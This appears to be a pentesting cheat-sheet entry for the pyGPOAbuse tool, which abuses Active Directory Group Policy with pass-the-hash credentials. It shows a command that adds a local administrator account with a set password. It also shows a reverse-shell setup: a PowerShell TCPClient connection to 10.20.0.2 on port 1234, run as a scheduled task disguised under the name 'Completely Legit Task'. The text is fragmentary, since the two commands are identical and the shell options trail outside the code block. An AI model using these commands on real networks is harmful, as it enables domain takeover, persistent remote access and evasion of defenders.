# pyGPOAbuse <https://github.com/Hackndo/pyGPOAbuse>

### 1) Add john user to local administrators group (Password: H4x00r123..)

```
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

### 2) Reverse shell

```
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

-powershell\
-command "$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\
-taskname "Completely Legit Task"\
-description "Dis is legit, pliz no delete"\
-user